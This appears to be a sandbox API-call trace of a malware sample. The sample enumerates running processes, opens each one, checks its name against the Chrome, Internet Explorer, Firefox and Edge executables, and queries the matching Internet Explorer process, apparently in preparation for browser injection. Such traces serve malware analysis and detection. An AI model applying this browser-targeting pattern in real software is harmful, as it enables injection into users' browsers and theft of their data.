	[0205.711] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.712] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x2cfc
	[0205.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.712] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.712] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.713] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.713] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.713] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0205.714] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x2d00
	[0205.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.714] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.714] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.715] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.715] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.715] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0205.716] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x2d04
	[0205.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.716] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0205.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.716] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.717] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0205.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.717] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.717] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.721] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x2d08
	[0205.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.721] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.721] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.722] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.722] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.722] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0205.723] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x2d0c
	[0205.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.723] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0205.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.723] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.724] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0205.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.724] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.724] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0205.725] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x2d10
	[0205.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.725] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0205.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.725] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.725] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0205.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.726] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.726] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0205.727] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x2d14
	[0205.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.727] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0205.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.727] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.727] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0205.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.727] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.728] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0205.728] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x2d18
	[0205.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.728] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0205.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.729] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.729] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0205.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.729] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.730] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0205.730] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0205.730] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0205.731] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x2d1c
	[0205.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.731] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0205.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.732] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.732] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0205.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.733] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.733] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0205.734] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x2d20
	[0205.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.734] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0205.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.734] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.735] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0205.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.735] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.735] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0205.736] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x2d24
	[0205.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.736] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0205.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.736] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.736] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0205.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.737] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.737] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0205.738] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x2d28
	[0205.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.738] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0205.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.738] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.738] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0205.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.739] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.739] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0205.740] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x2d2c
	[0205.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.740] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0205.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.740] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.741] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0205.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.741] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.742] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0205.742] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x2d30
	[0205.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.743] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0205.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.743] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.743] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0205.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.743] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.743] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0205.744] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x2d34
	[0205.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.744] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0205.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.745] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.745] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0205.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.745] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.746] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0205.746] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x2d38
	[0205.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.747] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0205.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.747] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.748] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0205.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.748] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.748] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0205.749] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x2d3c
	[0205.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.749] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0205.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.750] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.750] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0205.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.750] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.750] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0205.751] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x2d40
	[0205.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.751] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0205.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.751] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.752] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0205.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.752] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.752] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0205.753] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x2d44
	[0205.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.753] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0205.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.753] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.754] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0205.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.754] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.755] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0205.756] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x2d48
	[0205.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.756] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0205.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.757] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.757] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0205.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.758] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.758] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0205.759] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x2d4c
	[0205.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.759] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0205.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.759] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.760] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0205.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.760] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.761] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0205.761] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x2d50
	[0205.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.762] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0205.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.762] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.763] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0205.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.763] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.764] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0205.767] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x2d54
	[0205.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.768] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0205.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.768] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.768] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0205.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.769] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.769] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0205.770] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x2d58
	[0205.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.770] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0205.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.770] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0205.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.771] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0205.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.771] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.771] NtQueryInformationProcess (in: ProcessHandle=0x2d58, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
